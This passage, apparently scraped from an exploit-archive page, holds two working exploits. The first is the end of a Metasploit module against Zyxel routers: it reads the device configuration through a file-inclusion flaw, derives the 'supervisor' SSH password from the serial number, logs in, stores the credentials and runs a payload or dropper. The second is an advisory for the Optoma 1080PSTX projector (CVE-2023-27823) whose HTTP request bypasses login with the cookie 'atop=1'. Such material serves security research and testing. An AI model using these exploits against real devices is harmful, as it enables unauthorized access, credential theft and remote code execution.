serial_num_method3(serial_number)<br /> # SerialNumMethod3 password derivation function<br /><br /> # constant definitions<br /> keystr1_byte_array = 'IO'.bytes.to_a<br /> keystr2_byte_array = 'lo'.bytes.to_a<br /> keystr3_byte_array = '10'.bytes.to_a<br /> valstr_byte_array = '23456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnpqrstuvwxyz0123456789ABCDEF'.bytes.to_a<br /> offset1 = 0x8<br /> offset2 = 0x20<br /><br /> round3 = double_hash(serial_number, 10)<br /> round3.upcase!<br /> round3_byte_array = round3.bytes.to_a<br /><br /> md5_str = Digest::MD5.hexdigest(serial_number)<br /> md5_str_array = md5_str.split(//)<br /> offset = md5_str_array[2] + md5_str_array[3] + md5_str_array[4] + md5_str_array[5]<br /><br /> result = mod3_key_generator(offset.to_i(16))<br /> offset = result[0]<br /> round4 = result[1]<br /><br /> for i in 0..9 do<br /> if round4[i] == 1<br /> new_val = (((round3_byte_array[i] % 0x1a) * 0x1000000) >> 0x18) + 'A'.bytes.join.to_i<br /> round3_byte_array[i] = new_val<br /> for j in 0..1 do<br /> next unless (round3_byte_array[i] == keystr1_byte_array[j])<br /><br /> index = offset1 + ((offset + j) % 0x18)<br /> round3_byte_array[i] = valstr_byte_array[index]<br /> break<br /> end<br /> elsif round4[i] == 2<br /> new_val = (((round3_byte_array[i] % 0x1a) * 0x1000000) >> 0x18) + 'a'.bytes.join.to_i<br /> round3_byte_array[i] = new_val<br /> for j in 0..1 do<br /> next unless (round3_byte_array[i] == keystr2_byte_array[j])<br /><br /> index = offset2 + ((offset + j) % 0x18)<br /> round3_byte_array[i] = valstr_byte_array[index]<br /> break<br /> end<br /> else<br /> new_val = (((round3_byte_array[i] % 10) * 0x1000000) >> 0x18) + '0'.bytes.join.to_i<br /> round3_byte_array[i] = new_val<br /> for j in 0..1 do<br /> next unless (round3_byte_array[i] == keystr3_byte_array[j])<br /><br /> var = ((offset + j) >> 0x1f) >> 0x1d<br /> index = ((offset + j + var) & 7) - var<br /> round3_byte_array[i] = valstr_byte_array[index]<br /> break<br /> end<br /> end<br /> end<br /> pwd = round3_byte_array.pack('C*')<br /> return pwd<br /> end<br /><br /> def crack_supervisor_pwd(serial)<br /> # crack supervisor password using the device serial number<br /> # there are two confirmed hashing functions that can derive the supervisor password from the serial number:<br /> # SerialNumMethod2 and SerialNumMethod3<br /> # both passwords candidates will be returned as hashes<br /><br /> hash_pwd = { 'method2' => nil, 'method3' => nil }<br /> # SerialNumMethod2<br /> hash_pwd['method2'] = serial_num_method2(serial)<br /> # SerialNumMethod3<br /> hash_pwd['method3'] = serial_num_method3(serial)<br /><br /> print_status("Derived supervisor password using SerialNumMethod2: #{hash_pwd['method2']}")<br /> print_status("Derived supervisor password using SerialNumMethod3: #{hash_pwd['method3']}")<br /> return hash_pwd<br /> end<br /><br /> def report_creds(user, pwd)<br /> credential_data = {<br /> module_fullname: fullname,<br /> username: user,<br /> private_data: pwd,<br /> private_type: :password,<br /> workspace_id: myworkspace_id,<br /> status: Metasploit::Model::Login::Status::UNTRIED<br /> }.merge(service_details)<br /><br /> cred_res = create_credential_and_login(credential_data)<br /> unless cred_res.nil?<br /> print_status("Credentials for user:#{user} are added to the database.")<br /> end<br /> end<br /><br /> def get_configuration<br /> # Get the device configuration by exploiting the LFI vulnerability<br /> return send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/Export_Log?/data/zcfg_config.json')<br /> })<br /> end<br /><br /> # Initiate the process configuration exception class used in the process_configuration function<br /> class ProcessConfigException < StandardError<br /> attr_reader :exception_type<br /><br /> def initialize(msg = 'This is my custom process config exception', exception_type = 'custom')<br /> @exception_type = exception_type<br /> super(msg)<br /> end<br /> end<br /><br /> def process_configuration(res)<br /> # Initiate the instance variable config to store the configuration<br /> @config = {}<br /><br /> # Parse the device configuration json file<br /> res_json = res.get_json_document<br /> if res_json.blank?<br /> raise ProcessConfigException.new 'No device configuration file found.', 'ConfigUnknown'<br /> end<br /><br /> # process json output and retrieve information about supervisor user, ssh port and ssh WAN service status<br /> # Also grab hardware and software version including the serial number to crack the password of user supervisor<br /> @config['hardware'] = res_json.dig('DeviceInfo', 'HardwareVersion')<br /> @config['software'] = res_json.dig('DeviceInfo', 'SoftwareVersion')<br /> @config['serial'] = res_json.dig('DeviceInfo', 'SerialNumber')<br /><br /> login_cfg = res_json.dig('X_ZYXEL_LoginCfg', 'LogGp')<br /> unless login_cfg.nil?<br /> @config['ssh_user'] = login_cfg.select { |l| l['Account']&.select { |a| a['Username'] == 'supervisor' } }.blank? ? nil : 'supervisor'<br /> end<br /><br /> remote_service = res_json.dig('X_ZYXEL_RemoteManagement', 'Service')<br /> unless remote_service.nil?<br /> service = remote_service.select { |s| s['Name'] == 'SSH' }.first<br /> if service&.fetch('Name', nil) == 'SSH'<br /> @config['ssh_port'] = service['Port']<br /> @config['ssh_wan_access'] = service['Mode']<br /> @config['ssh_service_enabled'] = service['Enable']<br /> end<br /> end<br /> print_status("Hardware:#{@config['hardware']} Firmware:#{@config['software']} Serial:#{@config['serial']}")<br /><br /> # check if all hash key/value pairs are populated and raise exceptions if retrieved config is not vulnerable<br /> if @config['serial'].nil? || @config['ssh_user'].nil? || @config['ssh_port'].nil? || @config['ssh_wan_access'].nil? || @config['ssh_service_enabled'].nil?<br /> raise ProcessConfigException.new 'Device serial, supervisor user, SSH port, or SSH WAN access/service status not found.', 'ConfigUnknown'<br /> end<br /><br /> # check if ssh service is enabled<br /> # if true then check ssh_port is open and ssh service is accessible from the WAN side<br /> if @config['ssh_service_enabled']<br /> if @config['ssh_wan_access'] == 'LAN_WAN' && check_port(@config['ssh_port'])<br /> return<br /> else<br /> raise ProcessConfigException.new "WAN access to SSH service is NOT allowed or SSH port #{@config['ssh_port']} is closed. Try exploit from the LAN side.", 'ConfigUnreachable'<br /> end<br /> else<br /> raise ProcessConfigException.new 'SSH service is NOT available.', 'ConfigNotVulnerable'<br /> end<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> Timeout.timeout(datastore['WfsDelay']) { ssh_socket.exec!(cmd) }<br /> rescue Timeout::Error<br /> @timeout = true<br /> end<br /><br /> def do_login(ip, user, pass, ssh_port)<br /> # create SSH session and login<br /> # if login is successfull, return true else return false. All other errors will trigger an immediate fail<br /> opts = ssh_client_defaults.merge({<br /> auth_methods: ['password', 'keyboard-interactive'],<br /> port: ssh_port,<br /> password: pass<br /> })<br /><br /> opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']<br /><br /> begin<br /> ::Timeout.timeout(datastore['SSH_TIMEOUT']) do<br /> self.ssh_socket = Net::SSH.start(ip, user, opts)<br /> end<br /> rescue Rex::ConnectionError<br /> fail_with(Failure::Unreachable, 'Disconnected during negotiation')<br /> rescue Net::SSH::Disconnect, ::EOFError<br /> fail_with(Failure::Disconnected, 'Timed out during negotiation')<br /> rescue Net::SSH::AuthenticationFailed<br /> return false<br /> rescue Net::SSH::Exception => e<br /> fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")<br /> end<br /><br /> fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket<br /> return true<br /> end<br /><br /> def check_port(port)<br /> # checks network port and return true if open and false if closed.<br /> Timeout.timeout(datastore['ConnectTimeout']) do<br /> TCPSocket.new(datastore['RHOST'], port).close<br /> return true<br /> rescue StandardError<br /> return false<br /> end<br /> rescue Timeout::Error<br /> return false<br /> end<br /><br /> def check<br /> # Initiate the instance variable config to store the configuration<br /> # @config = { 'hardware' => nil, 'software' => nil, 'serial' => nil, 'ssh_user' => nil, 'ssh_port' => nil, 'ssh_wan_access' => nil, 'ssh_service_enabled' => nil }<br /><br /> res = get_configuration<br /> return CheckCode::Safe if res.nil? || res.code != 200<br /><br /> begin<br /> process_configuration(res)<br /> rescue ProcessConfigException => e<br /> case e.exception_type<br /> when 'ConfigNotVulnerable', 'ConfigUnreachable'<br /> return CheckCode::Safe(e.message)<br /> when 'ConfigUnknown'<br /> return CheckCode::Unknown(e.message)<br /> end<br /> end<br /> return CheckCode::Vulnerable<br /> end<br /><br /> def exploit<br /> # run if AutoCheck is false (@config = nil), otherwise use the information in @config gathered during the check method<br /> unless @config<br /> res = get_configuration<br /> fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') if res.nil? || res.code != 200<br /><br /> begin<br /> process_configuration(res)<br /> rescue ProcessConfigException => e<br /> case e.exception_type<br /> when 'ConfigNotVulnerable'<br /> return fail_with(Failure::NotVulnerable, e.message)<br /> when 'ConfigUnreachable'<br /> return fail_with(Failure::Unreachable, e.message)<br /> when 'ConfigUnknown'<br /> return fail_with(Failure::Unknown, e.message)<br /> end<br /> end<br /> end<br /><br /> # extra checks added to handle ForceExploit true setting<br /> if @config['ssh_service_enabled']<br /> if @config['ssh_wan_access'] == 'LAN_WAN' && check_port(@config['ssh_port'])<br /> print_status("SSH service is available and SSH Port #{@config['ssh_port']} is open. Continue to login.")<br /> else<br /> fail_with(Failure::Unreachable, 'SSH service is not availabe and/or SSH port is closed.')<br /> end<br /> else<br /> fail_with(Failure::BadConfig, 'SSH service and/or SSH port information is missing.')<br /> end<br /><br /> # derive supervisor password candidates using password derivation method SerialNumMethod2 and SerialNumMethod3<br /> if @config['serial'].nil?<br /> fail_with(Failure::BadConfig, 'Serial device number is missing to crack the supervisor password.')<br /> else<br /> supervisor_pwd = crack_supervisor_pwd(@config['serial'])<br /> end<br /><br /> # try supervisor password derived by SerialNumMethod3 first, if it fails then try the password derived by SerialNumMethod2<br /> if do_login(datastore['RHOST'], @config['ssh_user'], supervisor_pwd['method3'], @config['ssh_port'])<br /> print_status('Authentication with derived supervisor password using Method3 is successful.')<br /> report_creds(@config['ssh_user'], supervisor_pwd['method3']) if datastore['STORE_CRED']<br /> elsif do_login(datastore['RHOST'], @config['ssh_user'], supervisor_pwd['method2'], @config['ssh_port'])<br /> print_status('Authentication with derived supervisor password using Method2 is successful.')<br /> report_creds(@config['ssh_user'], supervisor_pwd['method2']) if datastore['STORE_CRED']<br /> else<br /> fail_with(Failure::NoAccess, 'Both supervisor password derivation methods failed to authenticate.')<br /> end<br /><br /> if target.name == 'Interactive SSH'<br /> handler(ssh_socket)<br /> return<br /> end<br /><br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> # Don't check the response here since the server won't respond<br /> # if the payload is successfully executed.<br /> execute_cmdstager(linemax: 500)<br /> end<br /> @timeout ? ssh_socket.shutdown! : ssh_socket.close<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: Optoma 1080PSTX Firmware C02 - Auth Bypass<br /># Date: 2023/05/09<br /># Exploit Author: Anthony Cole<br /># Contact: http://twitter.com/acole76<br /># Website: http://twitter.com/acole76<br /># Vendor Homepage: http://optoma.com<br /># Version: Optoma 1080PSTX Firmware C02<br /># Tested on: N/A<br /># CVE : CVE-2023-27823<br /><br />Details<br />By default the web interface of the 1080PSTX requires a username and password to access the application control panel. However, an attacker, on the same network, can bypass it by manually setting the "atop" cookie to the value of "1".<br /><br />GET /index.asp HTTP/1.1<br />Host: projector<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: atop=1<br />Connection: close<br /><br /></code></pre>